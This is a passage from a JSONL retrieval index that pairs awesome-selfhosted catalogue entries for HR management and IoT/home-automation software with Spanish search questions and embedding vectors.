Docker/Python/Nodejs]. MintHCM β€” Tool for Human Capital Management based on two popular, well-known business applications SugarCRM Community Edition and SuiteCRM [AGPL-3.0, PHP].", "indexar": "con quΓ© puedo montar un sistema completo para la gestiΓ³n del capital humano desde el recruitment hasta la nΓ³mina", "v": [0.00365, 0.07721, -0.01696, -0.16272, -0.04264, -0.05479, -0.05335, 0.07005, -0.26076, -0.08188, -0.09579, -0.02879, 0.12382, -0.02533, 0.04569, 0.0228, 0.04306, -0.06782, -0.01905, 0.04363, -0.06134, -0.08232, 0.11024, 0.05409, -0.0373, -0.0253, 0.08991, -0.08997, -0.08568, 0.00263, 0.12051, -0.01981, 0.01016, -0.07039, 0.05585, 0.0531, -0.02838, 0.06601, -0.07504, 0.01802, -0.04885, 0.04774, 0.01828, 0.07767, 0.06162, -0.09544, 0.07619, -0.10341, 0.02082, -0.04854, -0.0969, 0.05242, -0.11777, -0.08358, 0.00669, -0.11224, -0.00265, -0.00411, 0.03071, -0.11364, -0.13822, 0.13956, -0.02799, 0.06026, -0.03463, 0.06153, -0.05981, -0.04818, -0.045, 0.0122, -0.05976, -0.09706, -0.07166, 0.10192, 0.07832, -0.0028, 0.01247, 0.04298, 0.03875, -0.03265, -0.06161, -0.00287, -0.1661, -0.01928, -0.01077, 0.02012, 0.07915, 0.03754, 0.00475, 0.04562, 0.06784, -0.08833, 0.05211, -0.08059, 0.00906, 1e-05, -0.01773, 0.06815, -0.09722, 0.00522, -0.08875, -0.02166, -0.06817, 0.12832, -0.10004, 0.05994, 0.06407, -0.07003, 0.03363, -0.10069, -0.05516, -0.07237, -0.03908, 0.02934, -0.11166, -0.05374, -0.08344, 0.05371, 0.04009, -0.05902, -0.10797, 0.03858, 0.05715, -0.04768, 0.02812, -0.0472, 0.06307, 0.0697, 0.08801, -0.04139, 0.05428, 0.01479, -0.12395, -0.09827, 0.00509, -0.07699, -0.08051, 0.0372, -0.00434, -0.00189, -0.11498, 0.01027, 0.11546, -0.10923, 0.03712, 0.01983, 0.00151, -0.11769, 0.0628, -0.00066, -0.06287, -0.04309, 0.07827, 0.01369, -0.08773, -0.04847, 0.12181, 0.03907, 0.03725, -0.00597, 0.01257, -0.03825, -0.05457, 0.10087, 0.05003, -0.00646, -0.00222, -0.06654, 0.02322, 0.07242, 0.02779, 0.0594, 0.06408, -0.01667, 0.05199, -0.02769, -0.0798, -0.10978, 0.01502, 0.08904, 0.03467, -0.01421, 0.03411, -0.0106, -0.00385, 0.01126, -0.02734, 0.00289, -0.01129, 0.06179, -0.0208, 0.05046, -0.0399, 0.10417, 0.01582, 0.0198, -0.04222, -0.02239, 0.00053, 0.07462, -0.02632, -0.00377, 0.01589, 0.04, -0.00317, 0.012, -0.00475, -0.00563, 0.03753, 0.06532, -0.05106, -0.03808, 0.03472, -0.01783, 0.00578, -0.05642, -0.02021, 0.02897, -0.01058, 0.01544, 0.03017, -0.01346, 0.06472, 0.06879, -0.06102, -0.04943, 0.02978, 0.0124, 0.03146, 0.03232, -0.00958, 0.00283, 0.05746, -0.07484, -0.01422, 0.06702, -0.0289, 0.0125, -0.05743, -0.01072, 0.0006, 0.10707, -0.06931, -0.03017, -0.04481, -0.06361, 0.00416, -0.01605, -0.01149, -0.06418, -0.0768, 0.00725, -0.05885, -0.03537, -0.01177, -0.03693]} +{"tipo": "pregunta", "herramienta": "Human Resources Management (HRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Human Resources Management (HRM)", "tema": "human resources management (hrm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Human Resources Management (HRM): admidio β€” User management system for websites of organizations and groups. The system has a flexible role model so that it’s possible to reflect the structure and permissions of your organization [GPL-2.0, PHP/Docker]. Frappe HR β€” Complete HRMS solution with over 13 different modules right from employee management, onboarding, leaves, to payroll, taxation, and more [GPL-3.0, Docker/Python/Nodejs]. MintHCM β€” Tool for Human Capital Management based on two popular, well-known business applications SugarCRM Community Edition and SuiteCRM [AGPL-3.0, PHP].", "indexar": "cual es una alternativa libre para administrar usuarios y permisos en grupos corporativos", "v": [0.14249, 0.07649, 0.01358, -0.13957, 0.00374, -0.05122, 0.03674, -0.09941, -0.20672, -0.15981, -0.00106, -0.12841, 0.11114, 0.02178, 0.08305, -0.09984, 0.08913, -0.0398, 0.03621, 0.05689, 0.03053, -0.01036, -0.04895, 0.03644, -0.07307, -0.10807, 0.05546, -0.07461, -0.05861, 0.04928, 0.03144, -0.02224, 0.02015, -0.06393, 0.01672, 0.01101, 0.0344, 0.06956, 0.04713, 0.03135, 0.03345, -0.01228, -0.16708, -0.01238, 0.06107, -0.01256, -0.1575, 0.00391, 0.02595, 0.00154, -0.07511, -0.00663, -0.08661, -0.02601, 0.00972, 0.01838, 0.15271, -0.17197, -0.03855, 0.00844, -0.15988, 0.02652, 0.00423, 0.09689, 0.00142, 0.10084, 0.11602, 0.01273, -0.09695, 0.16251, 0.04479, -0.0318, -1e-05, -0.03498, 0.01437, 0.04494, -0.09815, -0.01904, -0.031, 0.05642, 0.10928, 0.0123, -0.00806, -0.01127, -0.08861, -0.15907, 0.01707, -0.04416, -0.00982, 0.06341, 0.08714, -0.00651, 0.03538, 0.0248, -0.02373, -0.03844, 0.02413, 0.07894, -0.02579, 0.10914, 0.05584, 0.07818, -0.10502, 0.0737, -0.05927, 0.08825, -0.04606, -0.05943, -0.02408, 0.02341, 0.02394, -0.00223, 0.03774, 0.0777, 0.11566, -0.01839, -0.02816, -0.02547, 0.00343, -0.04389, -0.0082, -0.06799, 0.02409, -0.03168, 0.04341, -0.01248, 0.08861, 0.07988, -0.06997, -0.00486, 0.00797, -0.0046, -0.0582, 0.00169, -0.15542, -0.00652, -0.03913, 0.01972, -0.00636, -0.02377, -0.04707, 0.04557, 0.00852, -0.02911, 0.0845, 0.01712, 0.00522, -0.04359, 0.03288, 0.01498, -0.03358, 0.00081, -0.14443, 0.08996, -0.05622, 0.03357, -0.12414, -0.04892, -0.08545, 0.09582, 0.03414, -0.0237, 0.02098, 0.04386, -0.0242, -0.02403, -0.02668, -0.02375, -0.01164, 0.08192, 0.02236, 0.01163, 0.08596, -0.08114, 0.12698, -0.07711, -0.05549, -0.10047, 0.04942, 0.0045, -0.00058, -0.03349, -0.07879, -0.00419, -0.02091, -0.032, -0.01864, 0.06831, 0.06395, 0.06156, -0.03885, 0.10941, -0.00177, -0.07744, -0.00336, -0.00821, 0.02395, -0.04926, -0.02971, -0.03903, 0.00501, -0.01979, -0.04165, -0.01304, 0.00839, -0.05677, 0.01952, 0.08944, 0.12244, 0.05686, 0.05378, 0.00977, 0.04623, 0.00991, -0.10873, -0.02671, 0.02591, -0.01593, 0.02631, 0.02501, 0.01867, 0.03103, 0.05919, 0.00101, 0.05104, 0.01087, -0.0157, 0.04325, -0.0377, 0.03708, 0.02271, 0.01165, -0.01634, 0.01374, 0.03278, -0.0252, 0.04132, 0.00251, 0.00521, 0.00939, 0.04262, 0.05558, -0.01339, 0.01404, -0.0639, -0.04096, -0.08787, -0.00209, -0.09039, -0.05706, -0.05184, 0.05925, 0.02894, 0.00705, 0.05765, -0.02041]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): Domoticz β€” Home Automation System that lets you monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more [GPL-3.0, C/C++/Docker/Shell]. EMQX β€” Scalable MQTT broker. Connect 100M+ IoT devices in one single cluster, move and process real-time IoT data with 1M msg/s throughput at 1ms latency [Apache-2.0, Docker/Erlang]. evcc β€” Extensible Electric Vehicle Charge Controller and home energy management system [MIT, deb/Docker/Go]. FHEM β€” Automate common tasks in the household like switching lamps and heating. It can also be used to log events like temperature or power consumption. You can control it via web or smartphone frontends, telnet or TCP/IP directly [GPL-3.0, Perl]. FlowForge β€” Deploy Node-RED applications in a reliable, scalable and secure manner. The FlowForge platform provides DevOps capabilities for Node-RED development teams [Apache-2.0, Nodejs/Docker/K8S].", "indexar": "que programa me sirve para controlar y monitorizar dispositivos de casa como luces y sensores?", "v": [0.10922, 0.03686, -0.20971, -0.19446, 0.02069, -0.12955, -0.14413, -0.00803, 0.0336, -0.07396, -0.1083, -0.02338, -0.03075, -0.09574, 0.02171, -0.01299, 0.076, -0.15951, -0.01522, 0.03288, 0.00891, -0.02428, -0.08235, -0.03735, -0.0279, 0.10681, 0.09807, -0.10316, -0.05756, -0.04013, -0.08049, -0.00882, 0.10483, 0.01693, -0.13073, -0.11911, -0.00485, 0.0077, 0.03158, 0.092, -0.00406, 0.04503, 0.03106, -0.05328, 0.14683, -0.05797, 0.05094, -0.01631, 0.03578, -0.04355, -0.14718, 0.05812, -0.03891, 0.15946, -0.01429, -0.11543, 0.05489, -0.04773, 0.15045, -0.09049, -0.04111, -0.00603, 0.09037, -0.01044, -0.03164, -0.00742, 0.02011, 0.0392, -0.0511, -0.03933, 0.01248, 0.04253, 0.00203, 0.01401, 0.00484, 0.06764, -0.12725, -0.03147, 0.09503, -0.0941, -0.0403, 0.0055, -0.09158, 0.0724, 0.07078, -0.03999, -0.02291, -0.04807, -0.07877, -0.04707, -0.00555, 0.12608, 0.10142, 0.04709, 0.08221, 0.01414, 0.14674, 0.05981, 0.03535, 0.05683, 0.16336, -0.07663, -0.05487, 0.15789, 0.01258, 0.04192, 0.09746, -0.03663, 0.01076, -0.09141, -0.08189, 0.07251, -0.06389, -0.02432, -0.03189, 0.02776, -0.05154, -0.07094, 0.02915, 0.00066, -0.07482, -0.02522, 0.08726, -0.02935, 0.09765, -0.02128, 0.00303, -0.02046, 0.05721, 0.09204, 0.03566, -0.0479, 0.03655, -0.02421, -0.04689, -0.01256, -0.07354, -0.00578, -0.0402, -0.01582, -0.00018, 0.1186, 0.07919, -0.06211, 0.11216, -0.01772, -0.01414, 0.03614, -0.02681, 0.09043, -0.03241, 0.02469, -0.03259, -0.00602, 0.02408, 0.03306, -0.01314, -0.007, -0.05685, 0.05477, -0.0744, 0.02321, -0.05204, -0.02177, 0.00395, 0.01777, 0.02852, 0.04991, 0.11229, 0.05152, -0.07909, 0.07278, -0.01997, -0.01675, 0.00048, -0.0395, -0.00817, -0.03895, 0.00046, -0.05598, -0.02896, 0.12409, 0.02602, 0.03363, 0.04242, 0.06914, -0.05182, 0.06281, 0.02937, -0.00916, -0.01953, 0.02157, -0.00466, 0.01083, 0.09574, -0.02323, -0.03614, -0.01524, 0.01302, -0.01623, -0.01791, -0.00516, 0.07479, -0.00355, 0.04256, 0.06321, -0.01328, 0.02456, 0.0771, 0.05799, -0.01622, -0.00239, 0.05672, 0.01684, -0.05452, 0.00947, 0.02113, 0.04717, 0.01276, 0.03327, 0.11278, -0.01508, -0.01758, 0.03446, -0.02497, -0.02397, 0.02577, 0.04379, 0.00511, -0.06995, -0.02536, -0.08064, 0.01261, 0.04208, -0.0172, -0.04081, -0.01802, -0.02111, 0.02071, -0.03125, -0.06662, 0.05552, 0.02648, -0.04255, -0.04711, -0.03779, -0.04812, 0.01258, 0.01035, -0.03649, -0.00512, 0.02401, 0.0649, -0.00385, 0.01718, 0.04469]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): Domoticz β€” Home Automation System that lets you monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more [GPL-3.0, C/C++/Docker/Shell]. EMQX β€” Scalable MQTT broker. Connect 100M+ IoT devices in one single cluster, move and process real-time IoT data with 1M msg/s throughput at 1ms latency [Apache-2.0, Docker/Erlang]. evcc β€” Extensible Electric Vehicle Charge Controller and home energy management system [MIT, deb/Docker/Go]. FHEM β€” Automate common tasks in the household like switching lamps and heating. It can also be used to log events like temperature or power consumption. You can control it via web or smartphone frontends, telnet or TCP/IP directly [GPL-3.0, Perl]. FlowForge β€” Deploy Node-RED applications in a reliable, scalable and secure manner. The FlowForge platform provides DevOps capabilities for Node-RED development teams [Apache-2.0, Nodejs/Docker/K8S].", "indexar": "con que puedo montar un sistema escalable para conectar y procesar datos en tiempo real de miles de dispositivos IoT?", "v": [0.00426, 0.069, -0.2461, -0.14111, 0.02936, -0.10205, -0.06006, -0.02384, -0.14343, -0.03048, -0.116, -0.1388, 0.04707, 0.00478, 0.03592, 0.02384, 0.07241, -0.10886, -0.07126, -0.1456, -0.0564, -0.03183, -0.09383, -0.03524, -0.06032, 0.19428, 0.01224, 0.05382, -0.18649, 0.02104, 0.01613, -0.00353, 0.06384, -0.01221, -0.12955, -0.14992, -0.04082, 0.15188, 0.02912, -0.08522, 0.05415, 0.0234, -0.02155, 0.07786, 0.18541, 0.00306, 0.02944, -0.0515, -0.0561, -0.08549, -0.12981, 0.03112, -0.0811, 0.02374, -0.11304, -0.06065, 0.16719, -0.07567, 0.14896, -0.06503, -0.10389, 0.02073, -0.02823, -0.02993, 0.03294, -0.00368, -0.05652, 0.07267, -0.09604, 0.01597, -0.01479, -0.01022, -0.01017, 0.04648, 0.08094, 0.09087, 0.0302, -0.01341, 0.08492, 0.03249, -0.04545, -0.02882, 0.01825, 0.04478, -0.00048, 0.04805, 0.02623, -0.01332, 0.0335, 0.02544, 0.00424, 0.07982, 0.05297, -0.06337, 0.05416, -0.0195, 0.03697, -0.00231, 0.00662, 0.08122, -0.02558, 0.05336, -0.11428, 0.15928, -0.0012, -0.01094, 0.07602, -0.01153, 0.03095, -0.09058, -0.06646, -0.0066, -0.0388, -0.07519, -0.03423, -0.02996, -0.00605, -0.09495, -0.07914, 0.07093, -0.02568, 0.00989, 0.09012, -0.00116, 0.04132, 0.01507, -0.0158, 0.02368, 0.062, -0.02398, 0.08058, -0.00428, -0.069, -0.08495, -0.02714, 0.04227, -0.04903, -0.0733, 0.06272, -0.04235, 0.03502, 0.06971, -0.07033, -0.04443, 0.04985, -0.04321, -0.01595, -0.00041, -0.02885, 0.01966, 0.02094, 0.11903, -0.0377, 0.03627, -0.05395, -0.05426, 0.03626, -0.05896, -0.03601, 0.01271, -0.01797, 0.05837, -0.02229, -0.01921, -0.00539, -0.00366, 0.00374, 0.03814, 0.14828, -0.00922, -0.07014, 0.08496, 0.03975, 0.01613, 0.02839, 0.02113, -0.01403, -0.04738, 0.01409, -0.03382, -0.04658, -0.00425, 0.05267, -0.0433, 0.04855, 0.06464, 0.01215, -0.02264, -0.02885, 0.06844, 0.03307, 0.03777, 0.07431, 0.08232, 0.04682, -0.09, -0.00685, -0.00986, -0.01392, 0.05474, -0.04091, -0.00107, 0.0043, 0.03495, -0.00157, 0.05051, -0.00241, 0.0517, 0.04689, 0.03305, 0.02455, -0.02284, 0.06092, -0.0362, -0.04639, 0.00634, 0.00028, 0.00851, -0.02239, 0.00855, -0.00192, 0.02723, 0.02759, 0.01747, -0.04473, -0.00084, -0.00925, 0.03027, -0.01622, -0.09372, -0.01483, -0.01169, 0.04008, -0.00771, -0.01135, -0.0156, 0.00833, -0.03047, -0.02213, -0.02481, 0.00731, 0.09872, 0.00701, -0.00285, -0.0166, -0.06758, -0.10914, 0.01334, -0.00321, -0.11731, -0.07183, 0.0037, 0.04641, -0.04143, -0.01251, -0.00811]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): Domoticz β€” Home Automation System that lets you monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more [GPL-3.0, C/C++/Docker/Shell]. EMQX β€” Scalable MQTT broker. Connect 100M+ IoT devices in one single cluster, move and process real-time IoT data with 1M msg/s throughput at 1ms latency [Apache-2.0, Docker/Erlang]. evcc β€” Extensible Electric Vehicle Charge Controller and home energy management system [MIT, deb/Docker/Go]. FHEM β€” Automate common tasks in the household like switching lamps and heating. It can also be used to log events like temperature or power consumption. You can control it via web or smartphone frontends, telnet or TCP/IP directly [GPL-3.0, Perl]. FlowForge β€” Deploy Node-RED applications in a reliable, scalable and secure manner. The FlowForge platform provides DevOps capabilities for Node-RED development teams [Apache-2.0, Nodejs/Docker/K8S].", "indexar": "cual es una alternativa libre a Home Assistant para gestionar la carga elΓ©ctrica y el consumo energΓ©tico del hogar?", "v": [-0.13029, 0.03963, -0.10046, -0.17715, 0.01398, 0.06874, -0.02174, 0.06946, -0.18785, -0.08148, -0.19866, -0.11441, -0.13333, 0.07555, 0.11884, -0.07551, 0.12848, -0.04987, -0.03381, 0.02998, -0.13473, 0.1094, -0.13705, -0.02781, -0.00136, 0.04411, -0.06159, 0.02959, -0.10506, 0.17267, 0.07484, 0.07664, 0.06506, -0.09753, 0.0339, 0.10946, 0.09626, 0.04954, 0.13517, -0.1446, 0.06566, -0.03268, -0.01381, -0.02067, 0.02372, -0.04651, 0.06943, -0.07398, 0.02624, 0.03825, -0.1601, 0.07777, -0.03749, 0.04479, 0.03321, -0.00374, 0.02077, -0.14363, 0.02644, -0.04878, 0.06443, 0.04577, 0.0875, 0.05644, 0.01789, 0.06093, -0.03315, 0.0656, -0.05017, -0.02677, 0.01391, 0.0168, -0.01202, -0.09001, -0.05099, 0.03579, -0.0037, 0.00566, 0.0384, 0.01144, 0.09564, -0.07367, -0.04665, 0.0076, -0.03442, -0.06475, 0.06693, -0.10106, 0.03532, -0.02464, -0.00035, -0.09067, 0.0401, 0.08944, 0.01792, 0.00345, 0.04, 0.03666, -0.00082, 0.04501, 0.06097, 0.01515, -0.03059, 0.02904, 0.12479, -0.08548, -0.04026, -0.04638, -0.02732, -0.0161, -0.10942, 0.05489, 0.0285, 0.00712, 0.08019, 0.02155, -0.1366, -0.06663, -0.08012, -0.01813, -0.04008, -0.00895, 0.14729, 0.00779, 0.02566, 0.01065, 0.11749, 0.00021, 0.07382, 0.05707, 0.00354, -0.02409, 0.03892, -0.06166, -0.0906, -0.04262, -0.06734, -0.10552, -0.02836, -0.00135, 0.00595, 0.0678, -0.00873, -0.05021, 0.08224, -0.0398, 0.0272, -0.00823, -0.00551, 0.04805, -0.02847, -0.02696, -0.03444, 0.0289, 0.06149, 0.05534, -0.06238, 0.00042, -0.06964, 0.0167, -0.01984, -0.06245, 0.02929, 0.0355, -0.06199, 0.01855, -0.04604, 0.01242, -0.0655, 0.04054, -0.08179, 0.05185, -0.03551, 0.0194, 0.02815, -0.09635, 0.06707, -0.08467, -0.0242, 0.01626, -0.06405, 0.00662, -0.1238, 0.03974, -0.02197, 0.10176, -0.01876, -0.02415, 0.00093, 0.01141, -0.06678, -0.02707, -0.07392, 0.04449, -0.02769, -0.02612, 0.014, -0.02591, -0.00102, -0.00896, 0.01048, -0.02256, 0.03394, 0.05906, 0.01457, 0.00411, 0.01209, 0.08927, 0.00655, -0.0257, -0.00836, -0.04018, 0.08548, -0.02018, -0.06656, -0.02183, 0.01303, -0.04614, -0.00276, 0.08394, 0.07357, 0.0688, -0.00017, 0.05414, 0.00248, 0.03411, 0.07793, -0.02246, -0.05471, 0.07938, 0.0071, -0.02126, 0.01041, 0.1008, 0.00071, -0.0075, -0.05549, -0.02403, -0.02573, 0.03114, -0.00778, 0.03291, -0.00513, 0.01788, -0.03994, 0.03941, -0.02716, 0.04158, -0.02279, -0.01199, 0.01453, 0.00206, 0.01575, 0.00147, 0.02953, 0.01354]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): FMD Server β€” A server to communicate with the FMD (Find My Device) Android app, to locate and control your devices [GPL-3.0, Docker/Go]. Gladys β€” Privacy-first home assistant [Apache-2.0, Nodejs/Docker]. Home Assistant β€” Home automation platform [Apache-2.0, Python/Docker]. ioBroker β€” Integration platform for the Internet of Things, focused on building automation, smart metering, ambient assisted living, process automation, visualization and data logging [MIT, Nodejs]. LHA β€” Light Home Automation application that is fully extensible using Blockly, HTML or Lua. It includes extensions such as ConBee, Philips Hue or Z-Wave JS [MIT, Lua]. Node RED β€” Browser-based flow editor that helps you wiring hardware devices, APIs and online services to create IoT solutions [Apache-2.0, Nodejs/Docker]. Onloc β€” Track and share your location in real time. Control and lock stolen or lost phones [AGPL-3.0, Docker]. openHAB β€” Vendor and technology agnostic open source software for home automation [EPL-2.0, Java].", "indexar": "que programa sirve para controlar dispositivos de hogar y automatizaciΓ³n inteligente?", "v": [0.07135, 0.05742, -0.16829, -0.2684, 0.06609, -0.12765, -0.08877, -0.01994, -0.1133, -0.01303, -0.07218, -0.12093, -0.02052, -0.02085, 0.04199, -0.01811, 0.11681, -0.15744, -0.04239, 0.05329, -0.00088, 0.07707, -0.06617, -0.04619, -0.05896, 0.02569, 0.03617, 0.05271, -0.16022, 0.0103, -0.01966, -0.0221, 0.08412, -0.01109, -0.09466, -0.06254, -0.0406, 0.04591, 0.0493, 0.06794, -0.05994, 0.01401, 0.04824, 0.00364, 0.18455, 0.07655, 0.0884, -0.06742, 0.0479, 0.03982, -0.18432, 0.03218, 0.02412, 0.10495, -0.00655, -0.05208, 0.01029, -0.10382, 0.02853, -0.1147, -0.04282, -0.04636, 0.05884, 0.0766, -0.04457, 0.02473, -0.00401, 0.06392, -0.04164, -0.03441, 0.02048, -0.00029, 0.02872, 0.03095, -0.00935, 0.09108, -0.07671, 0.00061, 0.11082, -0.01634, 0.01209, -0.10443, -0.09509, -0.02074, 0.11993, -0.10186, -0.0641, -0.09835, -0.03589, -0.06805, -0.05161, -0.02168, 0.08581, 0.0401, 0.0608, 0.02843, 0.12208, 0.05822, 0.03608, 0.08337, 0.08208, -0.09225, -0.12339, 0.14882, -0.01673, 0.10166, 0.08056, 0.00757, -0.01758, -0.07731, -0.07534, 0.0175, -0.02491, -0.03926, -0.03606, 0.08283, -0.01114, -0.0258, 0.04455, -0.04839, -0.07294, 0.0159, 0.08484, -0.01442, 0.10777, -0.02439, 0.06229, 0.06529, 0.03139, 0.00097, 0.08765, -0.07866, 0.01447, -0.02925, -0.05116, -0.00762, -0.0278, -0.06064, -0.09355, 0.00718, -0.01429, 0.12268, 0.00028, -0.03436, 0.08364, -0.04057, 0.03888, 0.03932, 0.03755, 0.07717, 0.02481, -0.00981, 0.01108, 0.00546, 0.02817, -0.01632, -0.00015, -0.06193, -0.03802, 0.05084, -0.06525, -0.03361, -0.05255, -0.0296, 0.00567, 0.01457, 0.05086, 0.05743, 0.06756, 0.08691, -0.06605, 0.09259, 0.01141, 0.01161, -0.07209, -0.04176, 0.05544, -0.00145, 0.02913, -0.05509, -0.08289, 0.06651, 0.00723, -0.03218, 0.02735, 0.05037, -0.00527, 0.00719, 0.05171, 0.01221, -0.06618, 0.02023, -0.02381, 0.0146, 0.05253, -0.01291, -0.0272, 0.00585, -0.00866, 0.01104, -0.02506, 0.03486, 0.09246, 0.00898, 0.02167, 0.09895, 0.06957, -0.01394, 0.04077, 0.04581, -0.00072, -0.00224, 0.06124, 0.03702, -0.02298, 0.04612, -0.05588, 0.00062, 0.0198, 0.02057, 0.10046, -0.07942, -0.02128, 0.05874, 0.01552, 0.00897, 0.03244, 0.05718, 0.0012, -0.07617, -0.04427, -0.07682, 0.04183, 0.01896, 0.0098, -0.0224, 0.00471, -0.03824, -0.02338, -0.04718, -0.07851, 0.02078, 0.01503, -0.03092, -0.09096, -0.00114, -0.04747, -0.00288, -0.01304, -0.04517, -0.04603, 0.05882, 0.01932, -0.03872, -0.00367, 0.05907]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): FMD Server β€” A server to communicate with the FMD (Find My Device) Android app, to locate and control your devices [GPL-3.0, Docker/Go]. Gladys β€” Privacy-first home assistant [Apache-2.0, Nodejs/Docker]. Home Assistant β€” Home automation platform [Apache-2.0, Python/Docker]. ioBroker β€” Integration platform for the Internet of Things, focused on building automation, smart metering, ambient assisted living, process automation, visualization and data logging [MIT, Nodejs]. LHA β€” Light Home Automation application that is fully extensible using Blockly, HTML or Lua. It includes extensions such as ConBee, Philips Hue or Z-Wave JS [MIT, Lua]. Node RED β€” Browser-based flow editor that helps you wiring hardware devices, APIs and online services to create IoT solutions [Apache-2.0, Nodejs/Docker]. Onloc β€” Track and share your location in real time. Control and lock stolen or lost phones [AGPL-3.0, Docker]. openHAB β€” Vendor and technology agnostic open source software for home automation [EPL-2.0, Java].", "indexar": "cual es una herramienta para monitorear la ubicaciΓ³n de mis telΓ©fonos en tiempo real?", "v": [0.01178, 0.13884, -0.06035, -0.14135, 0.04382, -0.14007, -0.08209, 0.00392, 0.00174, -0.06489, -0.08074, -0.09772, 0.0694, -0.03926, 0.11071, -0.01819, 0.06562, -0.11826, 0.04287, 0.02821, -0.07202, 0.04171, -0.16158, 0.06941, -0.09516, 0.03143, 0.03448, 0.01037, -0.20824, 0.01861, 0.06246, -0.03976, 0.02435, -0.04775, -0.06005, -0.10696, 0.09814, 0.05521, -0.04607, 0.06565, -0.01104, 0.00493, -0.00102, -0.00803, 0.08704, -0.09499, -0.03349, -0.00549, -0.00921, -0.01564, -0.12651, 0.04544, -0.06521, 0.08678, 0.02455, -0.18419, 0.24236, -0.02798, 0.08985, -0.08758, -0.13397, -0.04629, -0.08736, -0.05026, 0.07168, -0.01762, 0.0582, -0.02284, -0.10308, -0.11767, -0.03716, 0.0055, -0.00126, -0.00718, 0.05631, 0.00854, -0.06098, -0.03506, 0.05821, -0.05411, 0.03689, -0.03147, -0.07227, 0.07671, -0.15093, 0.00217, 0.11255, -0.04167, -0.09012, -0.14282, -0.01933, 0.12302, -0.0586, 0.03652, 0.02465, -0.01318, 0.04861, -0.03291, -0.01188, 0.06256, 0.17634, -0.06913, -0.05703, 0.08759, -0.00679, 0.04221, -0.05437, -0.02955, -0.06379, -0.08702, 0.01209, -0.03113, -0.06028, 0.0272, -0.03217, 0.0328, 0.03445, -0.07342, -0.01492, -0.09642, -0.03075, -0.00422, -0.06935, -0.06275, 0.03312, 0.07346, -0.0406, -0.04202, 0.02862, -0.04065, 0.02035, -0.06551, -0.0221, -0.04863, -0.0648, -0.00708, 0.00116, -0.02694, 0.04964, -0.07574, -0.03321, 0.04669, -0.02547, -0.14835, -0.00204, 0.03944, -0.02417, 0.04143, -0.05628, -0.00649, -0.02118, 0.03039, 0.03974, 0.05767, -0.00197, 0.0177, -0.06543, 0.03824, -0.07032, 0.04401, 0.01444, -0.06501, -0.02188, -0.03143, 0.00787, -0.09749, -0.00791, 0.06514, 0.09623, -0.0116, -0.00192, 0.01282, 0.06288, -0.04575, -0.07037, -0.0326, -0.02717, 0.01911, 0.00277, -0.11596, 0.00706, 0.06058, -0.01131, -0.00927, 0.03444, 0.02, -0.02276, 0.02653, 0.00825, 0.02798, 0.06435, -0.00795, 0.05701, 0.01651, -0.00767, -0.02745, -0.02286, -0.08687, 0.04515, -0.03185, -0.05103, -0.05299, 0.00674, -0.00065, 0.01893, 0.0688, -0.0497, 0.0515, -0.03733, 0.05636, 0.02309, -0.00537, 0.04107, 0.0005, -0.06468, -0.06116, 0.03731, -0.01517, -0.04495, 0.01906, 0.03145, 0.01005, 0.06968, -0.02234, -0.06418, 0.01966, 0.01622, 0.09733, -0.00317, -0.05433, -0.02606, 0.02046, 0.01823, -0.03064, 0.00265, 0.00061, 0.09014, -0.05705, -0.00402, -0.0838, 0.04301, 0.07445, 0.03479, 0.01668, -0.04042, -0.01859, -0.04901, -0.01577, -0.03992, -0.09918, -0.02439, 0.04326, 0.09439, -0.00699, 0.07648, -0.01619]} +{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): FMD Server β€” A server to communicate with the FMD (Find My Device) Android app, to locate and control your devices [GPL-3.0, Docker/Go]. Gladys β€” Privacy-first home assistant [Apache-2.0, Nodejs/Docker]. Home Assistant β€” Home automation platform [Apache-2.0, Python/Docker]. ioBroker β€” Integration platform for the Internet of Things, focused on building automation, smart metering, ambient assisted living, process automation, visualization and data logging [MIT, Nodejs]. LHA β€” Light Home Automation application that is fully extensible using Blockly, HTML or Lua. It includes extensions such as ConBee, Philips Hue or Z-Wave JS [MIT, Lua]. Node RED β€” Browser-based flow editor that helps you wiring hardware devices, APIs and online services to create IoT solutions [Apache-2.0, Nodejs/Docker]. Onloc β€” Track and share your location in real time. Control and lock stolen or lost phones [AGPL-3.0, Docker]. openHAB β€” Vendor and technology agnostic open source software for home automation [EPL-2.0, Java].", "indexar": "con que puedo montar un sistema de domΓ³tica que funcione con varios tipos de hardware diferentes?", 